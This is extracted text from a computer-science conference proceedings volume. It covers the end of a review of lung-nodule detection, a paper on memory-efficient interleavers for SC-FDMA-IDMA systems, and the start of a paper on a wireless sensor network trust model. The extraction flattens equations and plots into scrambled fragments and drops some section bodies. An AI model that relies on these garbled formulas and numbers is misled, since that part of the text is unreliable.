to make sure it includes all nodules. To overcome juxta-pleural nodule issue (these
nodules are attached to chest wall, and when lung segmentation is performed, these
nodules generally get excluded as noise), Chung et al. [35] used Chan-Vese (CV)
model along with Bayesian approach.
After the segmentation of lung, the very next stage is nodule identification which
involves candidate detection and reduction of false positives [36, 37]. Lung nodules
vary in shape, size, density, location, and texture, and thus, detecting them is tedious
task. Due to variability of lung nodules, various techniques have been developed
for decades. The traditional machine learning tools were time-consuming and lack
learning adaptability. With the enormous development in deep convolutional neural
network (DCNNs), automatic nodule detection and characterization performance
have improved tremendously [13–18, 28].
Shaukat et al. [31] first enhanced nodules images using multi-scale dot enhance-
ment filter based on Hessian matrix, and then, using optimal thresholding on enhance
images, lung nodules were detected. Zheng et al. [21, 38] used four streams of
maximum intensity projection (MIP) images with four slab thicknesses to train the
2D CNNs for localizing and nodule detection. Zhang et al. [29] presented efficient
nodule detection system based on multi-scene deep learning framework (MSDLF)
with vessel removing filter, and they applied four channel CNN for four levels of
nodule. Kuo et al. [19] suggested using support vector machine (SVM) twice in
order to reduce false positive, once for nodule detection using four 2D features and
again for classification using eleven 3D features. Micro-nodule (diameter smaller
than 3 mm) detection is the most difficult job, and Monkam et al. [39] developed a
system based on ensemble learning of multi-view 3D CNNs to distinguish between
micro-nodule and non-nodules. Chenyang et al. [40] proposed a jointly optimized
nodule segmentation and classification (JNSC) method which adopts V-Net as the
backbone. Cai et al. [15] exploited two-stageMask R-CNN for nodule detection
and segmentation, first stage is region proposal network (RPN) and second stage is
outputs confidence. Li et al. [25] adopted generalized method of moments fuzzy C-
mean (GMMFCM) algorithm for segmentation of pulmonary nodules. To eliminate
false positives, Chung et al. [35] used concave point detection and circle or ellipse
Hough transform.
Once the nodule is identified, there are numerous nodule candidates generated, and
most of them are false positives. Features are measurable distinctive attributes of
segmented regions, which are prominent characteristics of nodules. Features can be
grouped based on shape, size, density, texture, and intensity [41, 42]. Wang et al.
[36] proposed mathematical descriptor using neighbor centroids clustering for spatial
Computer-Aided Detection and Diagnosis of Lung Nodules … 551
2.4 Classification
3 Experimental Benchmarks
One of the most widely used publically available databases is Lung Image Database
Consortium and Image Database Resource (LIDC-IDRI). Initiative is one of the
largest available public databases for lung cancer. It consists of 1018 cases that
include clinical thoracic CT scans in XML file format [49]. National Lung Screening
Trial (NLST) dataset: Around 54,000 participants were enrolled (2002–2004). Data
on cancer diagnosis and deaths were collected all the way on December 31, 2009
[50]. Vision and Image Analysis group and International Early Lung Cancer Action
Program (VIA/I-ELCAP) database consists of 50 LDCT scans of 1.25 mm slice
thickness, and nodule size in this database is quite small [51]. Nederlands–Leuvens
Longkanker Screening Onderzoek trial (NELSON) consists of LDCT scans, having
data of approximately 15,822 participants. Each set of images in DICOM format
is 1 mm slice thickness with 0.7 mm overlap between slices. Annotation generated
with either LungCare software or manually [52].
Accuracy, TPR, and FPR. Parameters required for the calculation of accuracy, Param-
eters required for the calculation of Accuracy, True Positive Rates (TPR) and False
Positive Rates (FPR) are: True Positives (TP), True Negatives (TN), False Positives
Computer-Aided Detection and Diagnosis of Lung Nodules … 553
(FP) and False Negative (FN) [10, 36]. TPR also known as sensitivity or recall is
given by Eq. 1, FPR is given by Eq. 2, and accuracy predicts exactness to original
samples given by Eq. 3.
TP
Sensitivity/TPR/Recall = (1)
TP + FN
FP
FPR = (2)
FP + TN
TP + TN
Accuracy = (3)
TP + TN + FP + FN
1
CPM = s(i) , FPs = {0.125, 0.25, 0.5, 1, 2, 4, 8} (4)
7 i=F P S
4 Discussion
The CAD systems based on various algorithms are compared based on two factors:
How efficiently system can detect a nodule and discriminating them into benign and
malignant with reduced FPs. Table 1 gives the comparison between different algo-
rithm used for nodule detection, and Table 2 gives comparison between classification
systems.
5 Conclusion
Table 1 Comparison
S. No First author, Algorithm Outcome
between different nodule
publication year
detection models
1 Ye et al. [11], Modified V-Net, 0.934(SEN for
2020 SVM classifier 8FPs/scan)
2 Kuo et al. [19], SVM 91% (SEN)
2020
3 Rey et al. [20], SVM (C-SVC) 82.9% (SEN)
2020
4 Zheng et al. [21], MIP slab 90% (SEN)
2020 thickness 9 mm
5 Li et al. [25], GMMFCM 0.9998(ACC),
2020 0.9756(SEN)
6 Zhang et al. [29], MSDLF 98.7%
2020 (efficient)
7 Gu et al. [30], Vessel 0.986(SEN)
2020 suppression
8 Roy et al. [32], Unsupervised 0.90(SEN),
2020 method 0.95(ACC)
Supervised 0.84(SEN),
method 0.95(ACC)
9 Gong et al. [37], 3D-CenterNet 90.6(CPM)
2020
10 Tan et al. [53], 3D-CNN 0.990(SEN)
2020
challenging task, and thus, the accurate elimination of vessels and anatomical noises
will ensure reduced false positives (FP). For future research studies, in order to
address database problem unsupervised learning methodology need to be explored
more along with multi-modality fusion techniques. Also need to emphasis on noise
elimination techniques for reduction of false positives.
Computer-Aided Detection and Diagnosis of Lung Nodules … 555
References
1. WHO Report on Cancer, Setting Priorities, Investing Wisely and Providing Care for All,World
Health Organization, Geneva, Switzerland. (2020).
2. Ozdemir, O., Russell, R. L., & Berlin, A. A. (2020). A 3D probabilistic deep learning system
for detection and diagnosis of lung cancer using low-dose CT scans. IEEE Transactions on
Medical Imaging, 39(5), 1419–1429. https://doi.org/10.1109/TMI.2019.2947595
3. Siegel, R. L., Miller, K. D., & Jemal, A. (2020). Cancer statistics, 2020. Cancer Journal for
Clinicians, 70(1), 7–30. https://doi.org/10.3322/caac.21590
4. De Koning, H. J. (2020). Reduced lung-cancer mortality with volume CT screening in a random-
ized trial. New England Journal of. Medicine, 382(6), 503–513. https://doi.org/10.1056/nejmoa
1911793
5. Snoeckx, A., Reyntiens, P., Desbuquoit, D., Spinhoven, M. J., Van Schil, P. E., Meerbeeck, J.
P., & Parizel, P. M. (2018). Evaluation of the solitary pulmonary nodule: Size matters, but do
not ignore the power of morphology. Insights into Imaging, 9(1), 73–86.
6. Zhou, Q. (2016). China national guideline of classification, diagnosis and treatment for lung
nodules. Zhongguo Zhi, 19(12), 793–798. https://doi.org/10.3779/j.issn.1009-3419.2016.12.12
7. Cressman, S. (2017). The cost-effectiveness of high-risk lung cancer screening and drivers of
program efficiency. Journal of Thoracic Oncology, 12(8), 1210–1222. https://doi.org/10.1016/
j.jtho.2017.04.021
8. Gu, J., Tian, Z., & Qi, Y. (2020). Pulmonary nodules detection based on deformable convolution.
IEEE Access, 8, 16302–16309. https://doi.org/10.1109/ACCESS.2020.2967238
9. Hussein, S., Kandel, P., Bolan, C. W., Wallace, M. B., & Bagci, U. (2019). Lung and pancreatic
tumour characterization in the deep learning era: Novel supervised and unsupervised learning
approaches. IEEE Transactions on Medical Imaging, 38(8), 1777–1787. https://doi.org/10.
1109/TMI.2019.2894349
10. Tong, C., et al. (2021). Pulmonary nodule classification based on heterogeneous features
learning. IEEE Journal on Selected Areas in Communications, 39(2), 574–581. https://doi.
org/10.1109/JSAC.2020.3020657
11. Ye, Y., Tian, M., Liu, Q., & Tai, H.-M. (2020). Pulmonary nodule detection using v-net and
high-level descriptor based SVM classifier. IEEE Access, 8, 176033–176041. https://doi.org/
10.1109/ACCESS.2020.3026168
12. Ali, I., Muzammil, M., Haq, I. U., Khaliq, A. A., & Abdullah, S. (2020). Efficient lung nodule
classification using transferable texture convolutional neural network. IEEE Access, 8, 175859–
175870. https://doi.org/10.1109/ACCESS.2020.3026080
13. Gong, L., Jiang, S., Yang, Z., et al. (2019). Automated pulmonary nodule detection in CT
images using 3D deep squeeze-and-excitation networks. International Journal of Computer
Assisted Radiology and Surgery, 14, 1969–1979. https://doi.org/10.1007/s11548-019-01979-1
14. Su, Y., Li, D., & Chen, X. (2020). Lung nodule detection based on faster R-CNN frame-
work. Computer Methods and Programs in Biomedicine. https://doi.org/10.1016/j.cmpb.2020.
105866
15. Cai, L., Long, T., Dai, Y., & Huang, Y. (2020). Mask R-CNN-based detection and segmentation
for pulmonary nodule 3D visualization diagnosis. IEEE Access, 8, 44400–44409. https://doi.
org/10.1109/ACCESS.2020.2976432
16. Harsono, I. W., Liawatimena, S., & Cenggoro, T. W. (2020). Lung nodule detection and clas-
sification from Thorax CT-scan using RetinaNet with transfer learning. Journal King Saud
University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.2020.03.013.
ISSN 1319-1578.
17. Shi, Y., Li, H., Zhang, H., Wu, Z., & Ren, S. (2020). Accurate and efficient LIF-Nets for 3D
detection and recognition. IEEE Access, 8, 98562–98571. https://doi.org/10.1109/ACCESS.
2020.2995886
18. Masood, A., et al. (2020). Automated decision support system for lung cancer detection and
classification via enhanced RFCN with multilayer fusion RPN. IEEE Transactions on Industrial
Informatics, 16(12), 7791–7801. https://doi.org/10.1109/TII.2020.2972918
556 N. Ali and J. Yadav
19. Kuo, C-F. J., Huang, C-C., Siao, J-J., Hsieh, C-W., Huy, V. Q., Ko, K-H., & Hsu, H-H. (2020).
Automatic lung nodule detection system using image processing techniques in computed
tomography. Biomedical Signal Processing and Control, 56, 101659. https://doi.org/10.1016/
j.bspc.2019.101659. ISSN 1746-8094.
20. Rey, A., Arcay, B., & Castro, A. (2020). A hybrid CAD system for lung nodule detection using
CT studies based in soft computing. Expert Systems with Applications, 114259. https://doi.org/
10.1016/j.eswa.2020.114259. ISSN 0957-4174.
21. Zheng, S., Cui, X., Vonder, Raymond, M., Veldhuis, N. J., Ye, Z., Vliegenthart, R., Oudkerk, M.,
& van Ooijen, P. M. A. (2020). Deep learning-based pulmonary nodule detection: Effect of slab
thickness in maximum intensity projections at the nodule candidate detection stage. Computer
Methods and Programs in Biomedical, 196, 105620. https://doi.org/10.1016/j.cmpb.2020.105
620. ISSN 0169-2607.
22. Suresh, S., & Mohan, S. (2019). NROI based feature learning for automated tumor stage
classification of pulmonary lung nodules using deep convolutional neural networks. Journal
of King Saud University-Computer and Information Sciences. https://doi.org/10.1016/j.jksuci.
2019.11.013. ISSN 1319-1578.
23. Al-Shabi, M., Lee, H. K., & Tan, M. (2019). Gated-dilated networks for lung nodule classifi-
cation in CT scans. IEEE Access, 7, 178827–178838. https://doi.org/10.1109/ACCESS.2019.
2958663
24. Veasey, B. P., Broadhead, J., Dahle, M., Seow, A., & Amini, A. A. (2020). Lung nodule malig-
nancy prediction from longitudinal CT scans with siamese convolutional attention networks.
IEEE Open Journal of Engineering in Medicine and Biology, 1, 257–264. https://doi.org/10.
1109/OJEMB.2020.3023614
25. Li, X., Li, B., Liu, F., Yin, H., & Zhou, F. (2020). Segmentation of pulmonary nodules using a
GMM fuzzy C-Means algorithm. IEEE Access, 8, 37541–37556. https://doi.org/10.1109/ACC
ESS.2020.2968936
26. Sun, Y., Tang, J., Lei, W., & He, D. (2020). 3D Segmentation of pulmonary nodules based on
multi-view and semi-supervised. IEEE Access, 8, 26457–26467. https://doi.org/10.1109/ACC
ESS.2020.2971542
27. Xie, Y., et al. (2019). Knowledge-based collaborative deep learning for benign-malignant lung
nodule classification on chest CT. IEEE Transactions on Medical Imaging, 38(4), 991–1004.
https://doi.org/10.1109/TMI.2018.2876510
28. Li, G., et al. (2020). Study on the detection of pulmonary nodules in CT images based on deep
learning. IEEE Access, 8, 67300–67309. https://doi.org/10.1109/ACCESS.2020.2984381
29. Zhang, Q., & Kong, X. (2020). Design of automatic lung nodule detection system based on
multi-scene deep learning framework. IEEE Access, 8, 90380–90389. https://doi.org/10.1109/
ACCESS.2020.2993872
30. Gu, X., Xie, W., Fang, Q., Zhao, J., & Li, Q. (2020). The effect of pulmonary vessel suppression
on computerized detection of nodules in chest CT scans. Medical Physics, 47, 4917–4927.
https://doi.org/10.1002/mp.14401
31. Shaukat, F., Raja, G., Ashraf, R., et al. (2019). Artificial neural network based classification
of lung nodules in CT images using intensity, shape and texture features. Journal of Ambient
Intelligence and Humanized Computing, 10, 4135–4149. https://doi.org/10.1007/s12652-019-
01173-w
32. Roy, R., Banerjee, P., & Chowdhury, A. S. (2020). A level set based unified framework for
pulmonary nodule segmentation. IEEE Signal Processing Letters, 27, 1465–1469. https://doi.
org/10.1109/LSP.2020.3016563
33. Samundeeswari, P., & Gunasundari, R. (2020). A novel multilevel hybrid segmentation and
refinement method for automatic heterogeneous true NSCLC nodules extraction. In 2020
5th International Conference on Devices, Circuits and Systems (ICDCS), Coimbatore, India
(pp. 226–235). https://doi.org/10.1109/ICDCS48716.2020.243586
34. Gong, J., Liu, J., Wang, L., Sun, X., Zheng, B., & Nie, S. (2018). Automatic detection
of pulmonary nodules in CT images by incorporating 3D tensor filtering with local image
feature analysis. Physica Medica, 46, 124–133. https://doi.org/10.1016/j.ejmp.2018.01.019.
ISSN 1120-1797.
Computer-Aided Detection and Diagnosis of Lung Nodules … 557
35. Chung, H., Ko, H., Jeon, S. J., Yoon, K. H., & Lee, J. (2018). Automatic lung segmentation
with Juxta-Pleural nodule identification using active contour model and bayesian approach.
IEEE Journal of Translational Engineering in Health and Medicine, 6, 1–13, 1800513. https://
doi.org/10.1109/JTEHM.2018.2837901
36. Wang, B., et al. (2020). A fast and efficient CAD system for improving the performance of
malignancy level classification on lung nodules. IEEE Access, 8, 40151–40170. https://doi.org/
10.1109/ACCESS.2020.2976575
37. Gong, Z., Li, D., Lin, J., Zhang, Y., & Lam, K.-M. (2020). Towards accurate pulmonary nodule
detection by representing nodules as points with high-resolution network. IEEE Access, 8,
157391–157402. https://doi.org/10.1109/ACCESS.2020.3019104
38. Zheng, S., Guo, J., Cui, X., Veldhuis, R. N. J., Oudkerk, M., & van Ooijen, P. M. A. (2020).
Automatic pulmonary nodule detection in CT scans using convolutional neural networks based
on maximum intensity projection. IEEE Transactions on Medical Imaging, 39(3), 797–805.
https://doi.org/10.1109/TMI.2019.2935553
39. Monkam, P., et al. (2019). Ensemble learning of multiple-view 3D-CNNs model for micro-
nodules identification in CT images. IEEE Access, 7, 5564–5576. https://doi.org/10.1109/ACC
ESS.2018.2889350
40. Chenyang, L., & Chan, S.-C. (2020). A joint detection and recognition approach to lung cancer
diagnosis from CT images with label uncertainty. IEEE Access, 8, 228905–228921. https://doi.
org/10.1109/ACCESS.2020.3044941
41. Zhou, Z., Li, S., Qin, G., Folkert, M., Jiang, S., & Wang, J. (2020). Multi-Objective based
radiomic feature selection for lesion malignancy classification. IEEE Journal of Biomedical
and Health Informatics, 24(1), 194–204. https://doi.org/10.1109/JBHI.2019.2902298
42. Khan, S. A., Nazir, M., Khan, M. A., et al. (2019). Lungs nodule detection framework
from computed tomography images using support vector machine. Microscopy Research and
Technique, 82, 1256–1266. https://doi.org/10.1002/jemt.23275
43. Sahu, P., Yu, D., Dasari, M., Hou, F., & Qin, H. (2019). A lightweight multi-section CNN for
lung nodule classification and malignancy estimation. IEEE Journal of Biomedical and Health
Informatics, 23(3), 960–968. https://doi.org/10.1109/JBHI.2018.2879834
44. Wang, W., et al. (2019). Nodule-Plus R-CNN and deep self-paced active learning for 3D
instance segmentation of pulmonary nodules. IEEE Access, 7, 128796–128805. https://doi.
org/10.1109/ACCESS.2019.2939850
45. Saba, T., Sameh, A., Khan, F., et al. (2019). Lung nodule detection based on ensemble of hand
crafted and deep features. Journal of Medical Systems, 43, 332. https://doi.org/10.1007/s10
916-019-1455-6
46. Zhang, B., et al. (2019). Ensemble learners of multiple deep CNNs for pulmonary nodules
classification using CT images. IEEE Access, 7, 110358–110371. https://doi.org/10.1109/ACC
ESS.2019.2933670
47. Zhai, P., Tao, Y., Chen, H., Cai, T., & Li, J. (2020). Multi-Task learning for lung nodule
classification on chest CT. IEEE Access, 8, 180317–180327. https://doi.org/10.1109/ACCESS.
2020.3027812
48. Cao, H., et al. (2019). Multi-Branch ensemble learning architecture based on 3D CNN for false
positive reduction in lung nodule detection. IEEE Access, 7, 67380–67391. https://doi.org/10.
1109/ACCESS.2019.2906116
49. Armato, S. G. (2011). The lung image database consortium (LIDC) and image database re-
source initiative (IDRI): A completed reference database of lung nodules on CT scans. Medical
Physics, 38(2), 915–931. https://doi.org/10.1118/1.3528204
50. NLST Datasets. Accessed: Aug. 15, 2020. [Online]. Available: https://cdas.can-cer.gov/dat
asets/nlst/
51. VIA/I-ELCAP Datasets. Accessed: Aug. 15, 2020. [Online]. Available: http://www.via.cornell.
edu/databases/lungdb.html
52. Ru Zhao, Y., Xie, X., de Koning, H. J., Mali, W. P., Vliegenthart, R., & Oudkerk, M. (2011).
NELSON lung cancer screening study. Cancer Imaging, 11(1A), S79–S84. https://doi.org/10.
1102/1470-7330.2011.9020
558 N. Ali and J. Yadav
53. Tan, M., Wu, F., Yang, B., Ma, J., Kong, D., Chen, Z., & Long, D. (2020). Pulmonary nodule
detection using hybrid two-stage 3D CNNs. Medical Physics, 47, 3376–3388. https://doi.org/
10.1002/mp.14161
54. Kuang, Y., Lan, T., Peng, X., Selasi, G. E., Liu, Q., & Zhang, J. (2020). Unsupervised multi-
discriminator generative adversarial network for lung nodule malignancy classification. IEEE
Access, 8, 77725–77734. https://doi.org/10.1109/ACCESS.2020.2987961
55. Masood, A., et al. (2020). Cloud-Based automated clinical decision support system for detection
and diagnosis of lung cancer in chest CT. IEEE Journal of Translational Engineering in Health
and Medicine, 8, 1–13, 4300113. https://doi.org/10.1109/JTEHM.2019.2955458
Efficient Interleaver Design
for SC-FDMAIDMA Systems
Abstract In many analysis fields, the use of multiple interleavers has recently
attracted growing interest. Interleavers which require less memory space for storing
chip patterns are considered as more efficient. We proposed efficient non-orthogonal
interleavers that are based on quadratic permutation polynomial with maximum
spread and cyclic shifting during some steps. Our work is on the great user sepa-
ration in single-carrier frequency division multiple access and interleave division
multiple access (SC-FDMAIDMA) systems. Through this technique, generating
random permutations is associate alternate with less memory demand and complex-
ness in (SC-FDMAIDMA) systems. The findings show that random interleavers
created by the proposed methodology are sufficient to be used in the scheme of
SC-FDMAIDMA without sacrificing its performance.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 559
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_45
560 R. Agarwal and M. K. Shukla
they proposed a way to tie the intersection between interleavers. Defined entry vari-
ables become hard to establish sufficient polynomials for pseudorandom interleavers
as consumer K numbers get greater and applications have to accommodate power
production time or integrated interleavers. The focus of the shifting is on the integra-
tion between the multiple interactions. We therefore want to provide a basic rule for
the construction of interleavers that decreases the memory needed, we need to design
them well so our goal is to create a non-orthogonal interleaver that works again as
a random interleaver and satisfies the two construction methods define and repro-
duce, i.e. A few numbers of input should be transmitted that are efficient to generate
interleaving pattern at the receiver. In this paper, the maximum spread quadratic
permutation polynomial is used to generate random integration of SC-FDMAIDMA
systems.
SC-FDMAIDMA is a multiple access hybrid framework that retains several desir-
able SC-FDMA and IDMA attributes; the output of BER is very close to that of
OFDM-IDMA. In this paper, the reason for the selection of the SC-FDMA-IDMA
method is that it offers very low impact, high access, moderate signal interference
and medium carrying, especially in comparison with IDMA and other equivalents,
like IDMA (OFDM-IDMA) based on orthogonal FDMA in Yadav et al. [6]. The
simple NOMA concept is to support many users in terms of time, frequency, and
space utilizing the same resource. Among the main features considered for the 5G
radio (NR) mobile communication system, non-orthogonal multi-access (NOMA)
was established. NOMA offers a number of assumed desirable advantages, such as
increased spectrum performance, reduced high reliability latency, and tremendous
accessibility. NOMA’s primary use case is to relay uplinks where most user devices
(UE) attempt to use real-time resources, and the same predicted system benefit. The
NOMA system’s potential advantage lies in better spectrum efficiency relative to
conventional orthogonal MA (OMA), where each customer will enjoy a dedicated
transmit service and a dedicated transfer service and a request for resource allocation
and reference and for secure transmission presented by Lai et al. [7]. Such feature
is critical for low latency communication systems (URLLC). Such codes may or
may not reflect the specified structure. NOMA spreadable schemes can be collected
under short and long spreading strategies. Shared access for multiple users (MUSA)
can be considered as an example of a short distribution system for NOMA where
a predefined set of non-orthogonal sequences is used as a method of user replica-
tion as in [8]. A key feature of the IDMA policy lies in the fact that it does not deal
with disturbances perceived as additional noise. During the acquisition process, a
priori LLR continues to be developed by updating the relevant signal statistics and
distortions. There has been a baseline evaluation of SC-FDMA-IDMA in the litera-
ture [8–10]. Section 2 include the interleaver designing, Sect. 3 explains the system
model of SC-FDMA-IDMA system, Sect. 4 shows the simulation results, and last
section concludes the paper.
Efficient Interleaver Design for SC-FDMAIDMA Systems 561
2 Interleaver Design
22k−1 = IC N (1)
We have obtained the value of k from the above Eq. 1 and use it in the Eq. 2
to find the initial interleaver
k
f (x) = 2 − 1 x + 2k+1 x 2 mod 22k−1 (2)
(3) For applying permutation in column indices here we let the initial interleaver
pattern (3,1,4,0,2,5) obtained from (2) is divided by R and remainder of each
element give the first row and next rows are generated by rotation shown in
Table 2. Storage in the column indices after the permutation shown by Table 3
(4) For row permutation, begin with initial interleaver, and other rows of the matrix
are generated by a simple one-step cyclic shifting of the previous interleaving
pattern such as in Table 4 and the last Table 5 shows the final storage in matrix
after the row permutation.
(5) A first row of the interleaver for user k is formed by cyclic shifting Sk steps of
the initial interleaver where int(S) = ICN /k is the changing unit step and int(S)
returns the maximum whole number that is not greater than s. For example,
data information bits m = 8, spreading factor sl = 3 chip length (m*sl = N =
IR * ICN ) = 24.
Let, IR = 4, ICN = 6, IR * ICN = 24, K = 3 and
S (6/3) = 2, S*k = 0, 2, 4 for k = 0, 1, 2.
Table 1 shows the initialization of the matrix of length N = 24.
Interleaving bit sequence for the user 1 is.
1 = 3,7,16,18,2,11,13,22,0,8,17,9,4,6,14,23,15,19,12,20,5,21,1,10.
First row for row permutation for user 2 = 4,0,2,5,3,1
First row for column permutation for user2 = 0,0,2,1,3,1
2 = 22,0,14,11,9,1,6,20,17,15,7,4,2,23,21,13,10,12,5,3,19,16,18,8
First row for row permutation for user 3 = 2,5,3,1,4,0
First row for column permutation for user 3 = 2,1,3,1,0,0
3 = 20,5,9,7,4,12,11,15,13,10,18,2,21,19,16,0,8,17,1,22,6,14,23,3.
562 R. Agarwal and M. K. Shukla
In next step, through the feedback path, these ratios are continuously updated
between the iteration process and an estimate of correct received bits is obtained.
c
noise(AWGN)
Subcarrier
User-1 d1*sl П1 DFT Mapping IDFT
Subcarrier
DFT
User-k dk*sll Пk Mapping IDFT
П1
User-1 DEC FFT
APP
П1
ESE Subcarrier
eESE(x(j) IDFT
De-Mapping
DEC Пk
User-k
APP
Пk
eDEC(xj)
Fig. 1 Transmitter and receiver structure of SC-FDMA-IDMA scheme in Agarwal and Shukla [15]
564 R. Agarwal and M. K. Shukla
4 Simulation Result
0
10
-2
Bit Error Rate (BER)
10
-3
10
-4
10
-5
10
-6
10
2 4 6 8 10 12 14 16 18 20
Eb/No (in dB)
Fig. 2 Bit error rate performance with numerous interleavers of the SC-FDMA-IDMA scheme (n
= 16, block = 50, iteration = 5)
Efficient Interleaver Design for SC-FDMAIDMA Systems 565
0
10
SC-FDMA-IDMA(lfdma),q=2,n=16,it=5block=50
-1 SC-FDMA-IDMA,n=8,it=5
10 SC-FDMA-IDMA,n=4,it=5,block=50
-2
10
Bit Error Rate
-3
10
-4
10
-5
10
-6
10
-4 -2 0 2 4 6 8
Eb/No
0
10
-1
10
-2
10
Bit Error Rate
-3
10
-4
10
-5
10
OFDM-IDMA,q=2,n=16,it=5block=50
-6 SC-FDMA-IDMA(lfdma),q=2,n=16,it=5block=50
10
2 4 6 8 10 12 14
Eb/No
Fig. 4 Compare the SC-FDMA-IDMA BER performance to other OFDM-IDMA systems under
the same simulation parameters
566 R. Agarwal and M. K. Shukla
5.8 dB for SC-FDMA-IDMA scheme and for same bit error rate OFDM-IDMA it
required 11 dB. From Fig. 4, we can say that for the SC-FDMA-IDMA scheme with
proposed interleaver, lower bit energies are required for transmission than OFDM-
IDMA scheme. All the simulations are done with assuming data bit = 512, sl = 16,
chip length = 8192, n (users) = 16 consider ICN = 512 so IR = 16 with random
interleaver (14*8196*5 = total bits required)huge memory is required at the base
station,in tree-based interleaver 2 orthogonal interleaver are required to generate
other interleaver but with proposed efficient interleaver required only(10 + 16*5
= total bits)we have to send only values of r, and n from these values all other
interleavers are generated. For.
5 Conclusions
A novel method is suggested in this paper to generate efficient interleaver that has
less memory storage requirement with less complexity. Simulation results show that
the proposed interleaver integrated with the SC-FDMA-IDMA scheme makes this
scheme highly recommended for uplink communication particularly for the 5G non-
orthogonal multiple access.
References
1. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2006). Interleave-division Multiple-access. IEEE
Transactions on Wireless Communication, 5(4), 938–947.
2. Kusume, K., & Bauch, G. (2008). Simple construction of multiple interleavers: Cyclically
shifting a single interleaver. IEEE Transactions on Communications, 56(9) 1394–1397s.
3. Ping, L., Liu, L., Wu, K., & Leung, W. K. (2003). A simple approach to near-optimal
multiuser detection: interleave-division multiple-access. In IEEE Wireless Communications
and Networking Conference, WCNC 2003 (vol. 4, no. 1, pp. 391–396).
4. Wu, S., Chen, X., & Zhou, S. (2009). A parallel interleaver design for IDMA systems. In
2009 International Conference on Wireless Communications & Signal Processing, Nanjing
(pp. 1–5). Shuang Wu.
5. Pupeza, Kavcic, A., & Ping, L. (2006). Efficient generation of interleavers for IDMA. In IEEE
International Conference on Communications, ICC 2006 (vol. 4, pp. 1508–1513).
6. Yadav, M., Gautam, P. R., Shokeen, V., et al. (2017). Modern Fisher-Yates shuffling based
random interleaver design for SCFDMA-IDMA systems. Wireless Personal Communications,
97, 63–73.
7. Lai, K. , Wen,L., & Lei, J., et al. (2019). Secure transmission with interleaver for uplink sparse
code multiple access system. IEEE Wireless Communications Letters, 8( 2), 336–339.
8. Haghighat, A., Nazar, S. N., Herath ,S., & Olesen, R. (2017). On the performance of
IDMA-Based Non-Orthogonal multiple access schemes. In IEEE 86th Vehicular Technology
Conference (VTC-Fall) (pp. 1–5), Toronto.
9. Hamdoun, H., Nazir, S., Alzubi, & Laskot, P. (2020). Performance benefits of network coding
for HEVC video communications in satellite networks, Iranian Journal of Electrical and
Electronic Engineering, 17(3), 1–11.
Efficient Interleaver Design for SC-FDMAIDMA Systems 567
10. Xiong, X., & Luo, Z.: SC-FDMA-IDMA: A hybrid multiple access scheme for LTE Uplink. In
7th International Conference on Wireless Communications, Networking and Mobile Computing
(pp. 1–5), Wuhan.
11. Hao, D., & Hoeher, P. A. (2008). Helical interleaver set design for interleave-division
multiplexing and related techniques. IEEE Communications Letters, 12(11), 843–845.
12. Takeshita, O. Y. (2007). Permutation polynomial interleavers: an algebraic-geometric perspec-
tive. IEEE Transactions on Information Theory, 53(6), 2116–2132.
13. Yadav, M., Shokeen, V., & Singhal, P. K. (2019). Flip Left-to-Right approach based inverse
tree interleavers for unconventional integrated OFDM-IDMA and SCFDMA-IDMA systems.
Wireless Personal Communications, 105, 1009–1026.
14. Hao, W., Ping, L., & Perotti, A. (2006). User-specific chip-level interleaver design for IDMA
systems. IEEE Electronic Letters, 42(4), 233–234.
15. Agarwal, R., & Shukla, M. (2017). SC-FDM-IDMA scheme employing BCH Coding.
International Journal of Electrical and Computer Engineering (IJECE), 7(2), 992–998.
16. Shukla, M., Srivastava, V., & Tiwari, S. (2008). Analysis and design of Tree Based Interleaver
for multiuser receivers in IDMA scheme. In 16th IEEE International Conference on Networks,
pp. 1–4, New Delhi.
Enhanced Bio-inspired Trust
and Reputation Model for Wireless
Sensor Networks
Abstract Today, WSNs are spread in both industry and academia; they are focusing
their research efforts in order to enhance their appliances. One of the first concerns
to solve in order to acquire that expected enrichment is to assure relieve a minimum
level of security in such a prohibitive environment. This study concentrates on trust
and reputation system management. The proposed approach titled enhanced bio-
inspired trust and reputation model (EBTRM) is Bio-inspired extending Trust and
Reputation Model. The aim of the proposed algorithm is to provide an adequate
security solution to collusion network of BTRM, which can provide a high level of
security and energy preserving ability
1 Introduction
In last few years, researchers and scientists pay more attention to the area of WSNs
[1]. WSNs are composed of large number of sensor nodes. These sensor nodes are
small in size and battery powered [2, 3]. In WSNs, sensor node senses the data,
collect, process and transmit the data to other nodes to complete a task in distributed
manner. In WSNs [4, 5], result is based on sensor nodes cooperation. WSNs use
wide variety of applications, for example, industrial process control, ecological and
habitat monitoring, home automation, health care system, weather forecasting, traffic
control, etc. Generally, WSNs are deployed in an outdoor environment, where the
V. Arya (B)
Department of ECE (FET), Gurukula Kangri (Deemed To Be University), Haridwar 249404, India
S. Rani
Department of Computer Science and Engineering, Gulzar Group of Institutes, Khanna, Punjab
141401, India
N. Choudhary
Department of CSE, JECRC, Jaipur, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 569
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_46
570 V. Arya et al.
Trust and reputation system (TRS) management is a creative solution for sustaining a
lowest security level between two objects having transactions or interactions within
a distributed system. Trust is a particular level of the subjective possibility with
which an agent will perform a particular action, while a reputation is an expectation
about behavior of an agent based on information about it or considerations of its
prior behavior. In most cases, these two conditions are distinguished definitely and
could be used changeably. In WSNs transactions, if we define the sensors asking for
services as client sensors and sensors providing services as server sensors, then the
client sensors will find out whether to have transactions with a server sensor based
on its trustworthiness or reputation. Trust and reputation model is usually composed
of five components: gathering info, scoring and ranking, selecting objects, having
transaction and reward or punishment. Gathering information, the first element of a
trust and reputation system, is responsible for collecting behavioral information about
other objects, for example, peers, agents or paths. The information collected might
come from different objects. It could be absolute observation or own experience or
information provided by nodes. Once information about an object has been perfectly
assemble and weighed, and a reputation score is then estimated and given base on
certain algorithm. The main aim of this process is to provide the clients a determinable
approach to decide which server node is most trustworthy. The next step is that a
client selects the most trustworthy or reputable server object in the society providing
certain applicability, and then, adequately has intercommunication with it. After
receiving the service provided, the client will access the result and give a score of
Enhanced Bio-inspired Trust and Reputation Model … 571
